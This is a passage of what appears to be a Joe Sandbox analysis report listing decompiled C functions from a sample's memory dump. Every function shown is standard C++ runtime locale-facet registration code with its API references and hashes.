Function 00449030 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00449030(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464674; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00448D6D(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464674 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00449030
0x00449037
0x00449041
0x00449046
0x0044904c
0x00449055
0x00449058
0x0044905d
0x00449061
0x00449066
0x0044906a
0x0044906e
0x00449074
0x0044907a
0x0044907b
0x00449082
0x00449085
0x0044908f
0x0044909d
0x0044909d
0x004490a2
0x004490a7
0x004490ad
0x004490b3
0x00449070
0x00449070
0x00449070
0x0044906e
0x004490b9
0x004490c0
0x004490cc

APIs

__EH_prolog3.LIBCMT ref: 00449037
std::_Lockit::_Lockit.LIBCPMT ref: 00449041

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0044907B
std::bad_exception::bad_exception.LIBCMT ref: 0044908F
__CxxThrowException@8.LIBCMT ref: 0044909D
std::locale::facet::_Facet_Register.LIBCPMT ref: 004490B3

Strings

bad cast, xrefs: 00449087

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 1676052248-3145022300
Opcode ID: 9885bb98750f0243d753569fa7801216e4d0f99e8d02e09cc47042ccbe9ff988
Instruction ID: 8acb2902ebb20b816fdd5b5fefdfd0aec791e551e1c03c7576e9e4bd4404b640
Opcode Fuzzy Hash: 9885bb98750f0243d753569fa7801216e4d0f99e8d02e09cc47042ccbe9ff988
Instruction Fuzzy Hash: 6F01A17190011597DF05EBA1D802ABE72356F90768F64052FF4217B2E2DFBC9D04979D

Uniqueness

Uniqueness Score: -1.00%

Function 0044A367 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0044A367(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464688; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0044A2B0(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464688 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0044a367
0x0044a36e
0x0044a378
0x0044a37d
0x0044a383
0x0044a38c
0x0044a38f
0x0044a394
0x0044a398
0x0044a39d
0x0044a3a1
0x0044a3a5
0x0044a3ab
0x0044a3b1
0x0044a3b2
0x0044a3b9
0x0044a3bc
0x0044a3c6
0x0044a3d4
0x0044a3d4
0x0044a3d9
0x0044a3de
0x0044a3e4
0x0044a3ea
0x0044a3a7
0x0044a3a7
0x0044a3a7
0x0044a3a5
0x0044a3f0
0x0044a3f7
0x0044a403

APIs

__EH_prolog3.LIBCMT ref: 0044A36E
std::_Lockit::_Lockit.LIBCPMT ref: 0044A378

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

collate.LIBCPMT ref: 0044A3B2
std::bad_exception::bad_exception.LIBCMT ref: 0044A3C6
__CxxThrowException@8.LIBCMT ref: 0044A3D4
std::locale::facet::_Facet_Register.LIBCPMT ref: 0044A3EA

Strings

bad cast, xrefs: 0044A3BE

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2346505839-3145022300
Opcode ID: 600f81275f010f1c53ab24df0f28d175cbdd0d801a773eaef576294da6138c2c
Instruction ID: 02f4a95f2e81d3cb96cfeaabcb109b76c232f9136632d39ce596336eb64a8c0e
Opcode Fuzzy Hash: 600f81275f010f1c53ab24df0f28d175cbdd0d801a773eaef576294da6138c2c
Instruction Fuzzy Hash: D801AD319402159BDF05EFA1D842AAE7334AF80328F64052FF9117B2E1EFBC9905979E

Uniqueness

Uniqueness Score: -1.00%

Function 00449664 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00449664(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x46467c; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00449197(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x46467c =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00449664
0x0044966b
0x00449675
0x0044967a
0x00449680
0x00449689
0x0044968c
0x00449691
0x00449695
0x0044969a
0x0044969e
0x004496a2
0x004496a8
0x004496ae
0x004496af
0x004496b6
0x004496b9
0x004496c3
0x004496d1
0x004496d1
0x004496d6
0x004496db
0x004496e1
0x004496e7
0x004496a4
0x004496a4
0x004496a4
0x004496a2
0x004496ed
0x004496f4
0x00449700

APIs

__EH_prolog3.LIBCMT ref: 0044966B
std::_Lockit::_Lockit.LIBCPMT ref: 00449675

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 004496AF
std::bad_exception::bad_exception.LIBCMT ref: 004496C3
__CxxThrowException@8.LIBCMT ref: 004496D1
std::locale::facet::_Facet_Register.LIBCPMT ref: 004496E7

Strings

bad cast, xrefs: 004496BB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2090539961-3145022300
Opcode ID: 8ddb7c36fe0674c5466ba721a118abaac646a8a6539ed7caa509d9a0552e634f
Instruction ID: 2d4bce040175c21765c0c17789aaf553b7b6c96980bfc873d15b42021a7baf33
Opcode Fuzzy Hash: 8ddb7c36fe0674c5466ba721a118abaac646a8a6539ed7caa509d9a0552e634f
Instruction Fuzzy Hash: 7301AD7190021597DF05EBA1D812AAE7234AF84368FA4012FF4217B2E1DF7C9D04979D

Uniqueness

Uniqueness Score: -1.00%

Function 00449701 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00449701(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464680; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0044922C(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464680 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00449701
0x00449708
0x00449712
0x00449717
0x0044971d
0x00449726
0x00449729
0x0044972e
0x00449732
0x00449737
0x0044973b
0x0044973f
0x00449745
0x0044974b
0x0044974c
0x00449753
0x00449756
0x00449760
0x0044976e
0x0044976e
0x00449773
0x00449778
0x0044977e
0x00449784
0x00449741
0x00449741
0x00449741
0x0044973f
0x0044978a
0x00449791
0x0044979d

APIs

__EH_prolog3.LIBCMT ref: 00449708
std::_Lockit::_Lockit.LIBCPMT ref: 00449712

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 0044974C
std::bad_exception::bad_exception.LIBCMT ref: 00449760
__CxxThrowException@8.LIBCMT ref: 0044976E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00449784

Strings

bad cast, xrefs: 00449758

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2090539961-3145022300
Opcode ID: e6106bdd86bfb90b5d6cf4b736dd3cc3e3c41be79eedef25342249799f7c01a5
Instruction ID: 267e9e1ecae1eceac1caf63bc48aaa712f15b3efb301a5713d8391c218526763
Opcode Fuzzy Hash: e6106bdd86bfb90b5d6cf4b736dd3cc3e3c41be79eedef25342249799f7c01a5
Instruction Fuzzy Hash: 65018B319106159BCF05EFA1E842AAE7235AF81364F64052FF4117B2E2DB7C9D04979D

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA74 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043DA74(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645cc; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CAD2(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645cc =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043da74
0x0043da7b
0x0043da85
0x0043da8a
0x0043da90
0x0043da99
0x0043da9c
0x0043daa1
0x0043daa5
0x0043daaa
0x0043daae
0x0043dab2
0x0043dab8
0x0043dabe
0x0043dabf
0x0043dac6
0x0043dac9
0x0043dad3
0x0043dae1
0x0043dae1
0x0043dae6
0x0043daeb
0x0043daf1
0x0043daf7
0x0043dab4
0x0043dab4
0x0043dab4
0x0043dab2
0x0043dafd
0x0043db04
0x0043db10

APIs

__EH_prolog3.LIBCMT ref: 0043DA7B
std::_Lockit::_Lockit.LIBCPMT ref: 0043DA85

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0043DAD3
__CxxThrowException@8.LIBCMT ref: 0043DAE1
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DAF7

Strings

bad cast, xrefs: 0043DACB
@FF, xrefs: 0043DA94

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: @FF$bad cast
API String ID: 2227438316-3886408270
Opcode ID: 95191256d134604b0a579dbc614c4e53424e233bf30e7aa387a9defdd1a2bb07
Instruction ID: b218dfc605c9e54472df6d21e592c83650baa73c147de49d2713c6d82b677c58
Opcode Fuzzy Hash: 95191256d134604b0a579dbc614c4e53424e233bf30e7aa387a9defdd1a2bb07
Instruction Fuzzy Hash: 7E018E71D0021597CF05FBA19912AAE7225AF84368F64052FF4117B2E1DBBC9905879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043EB12 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043EB12(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645f8; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E158(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645f8 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043eb12
0x0043eb19
0x0043eb23
0x0043eb28
0x0043eb2e
0x0043eb37
0x0043eb3a
0x0043eb3f
0x0043eb43
0x0043eb48
0x0043eb4c
0x0043eb50
0x0043eb56
0x0043eb5c
0x0043eb5d
0x0043eb64
0x0043eb67
0x0043eb71
0x0043eb7f
0x0043eb7f
0x0043eb84
0x0043eb89
0x0043eb8f
0x0043eb95
0x0043eb52
0x0043eb52
0x0043eb52
0x0043eb50
0x0043eb9b
0x0043eba2
0x0043ebae

APIs

__EH_prolog3.LIBCMT ref: 0043EB19
std::_Lockit::_Lockit.LIBCPMT ref: 0043EB23

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

moneypunct.LIBCPMT ref: 0043EB5D
std::bad_exception::bad_exception.LIBCMT ref: 0043EB71
__CxxThrowException@8.LIBCMT ref: 0043EB7F
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043EB95

Strings

bad cast, xrefs: 0043EB69

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2090539961-3145022300
Opcode ID: 5b359cfbe0da1bc55a19863ce3e3daaf05069fc6dba777718d0713f4e44e6c1c
Instruction ID: 08480ffe789ddbee97425dbef08b1b51974c8c8d31ad0ba1b2004bfe09a48859
Opcode Fuzzy Hash: 5b359cfbe0da1bc55a19863ce3e3daaf05069fc6dba777718d0713f4e44e6c1c
Instruction Fuzzy Hash: 2101C43190121997CF05EBA2D852BBEB2346F84324F64052FF5217B2E2DF7C9905879E

Uniqueness

Uniqueness Score: -1.00%

Function 0043DB11 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0043DB11(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t42;
				void* _t43;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t43 - 0x14, 0);
				_t42 =  *0x4645d0; // 0x0
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				 *((intOrPtr*)(_t43 - 0x10)) = _t42;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t43 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t43 + 8)), _t17);
				_t40 = _t18;
				if(_t18 == 0) {
					if(_t42 == 0) {
						if(E0041C210(_t32, _t43 - 0x10,  *((intOrPtr*)(_t43 + 8))) == 0xffffffff) {
							E004223BB(_t43 - 0x20, "bad cast");
							E00422CB4(_t43 - 0x20, 0x4597cc);
						}
						_t40 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x4645d0 =  *((intOrPtr*)(_t43 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t43 - 0x10)), _t40);
					} else {
						_t40 = _t42;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0040D978(_t43 - 0x14);
				return E0042574F(_t40);
			}

0x0043db11
0x0043db18
0x0043db22
0x0043db27
0x0043db2d
0x0043db36
0x0043db39
0x0043db3e
0x0043db42
0x0043db47
0x0043db4b
0x0043db4f
0x0043db66
0x0043db70
0x0043db7e
0x0043db7e
0x0043db83
0x0043db88
0x0043db8e
0x0043db94
0x0043db51
0x0043db51
0x0043db51
0x0043db4f
0x0043db9a
0x0043dba1
0x0043dbad

APIs

__EH_prolog3.LIBCMT ref: 0043DB18
std::_Lockit::_Lockit.LIBCPMT ref: 0043DB22

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0043DB70
__CxxThrowException@8.LIBCMT ref: 0043DB7E
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043DB94

Strings

bad cast, xrefs: 0043DB68
X5F, xrefs: 0043DB31

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: X5F$bad cast
API String ID: 2227438316-2322681278
Opcode ID: 810c96a09a8db2ea41ac0d47aab220f1580f4ca7eff9e77083c3f5b5c3feb3b5
Instruction ID: f2275f8579ee92c758e0d8ee71eccbd537c1200f90938186511b7d7d987a040b
Opcode Fuzzy Hash: 810c96a09a8db2ea41ac0d47aab220f1580f4ca7eff9e77083c3f5b5c3feb3b5
Instruction Fuzzy Hash: 2901A131E00215A7CF05EBA1AC52AAEB2356F84768F64052FF4117B2E2DF7CA904879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043EBAF Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043EBAF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645fc; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E24F(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645fc =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043ebaf
0x0043ebb6
0x0043ebc0
0x0043ebc5
0x0043ebcb
0x0043ebd4
0x0043ebd7
0x0043ebdc
0x0043ebe0
0x0043ebe5
0x0043ebe9
0x0043ebed
0x0043ebf3
0x0043ebf9
0x0043ebfa
0x0043ec01
0x0043ec04
0x0043ec0e
0x0043ec1c
0x0043ec1c
0x0043ec21
0x0043ec26
0x0043ec2c
0x0043ec32
0x0043ebef
0x0043ebef
0x0043ebef
0x0043ebed
0x0043ec38
0x0043ec3f
0x0043ec4b

APIs

__EH_prolog3.LIBCMT ref: 0043EBB6
std::_Lockit::_Lockit.LIBCPMT ref: 0043EBC0

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0043EC0E
__CxxThrowException@8.LIBCMT ref: 0043EC1C
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043EC32

Strings

bad cast, xrefs: 0043EC06
FF, xrefs: 0043EBCF

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: FF$bad cast
API String ID: 2227438316-3489107526
Opcode ID: bb5b11a0980b0aaf2d1b9e86abbf00709921517520bbcf2d4516f6415f5073dd
Instruction ID: 284f7263b38754d2b34d8566ebbc0dec7612ab0e3eba12c394053c8a67635ef4
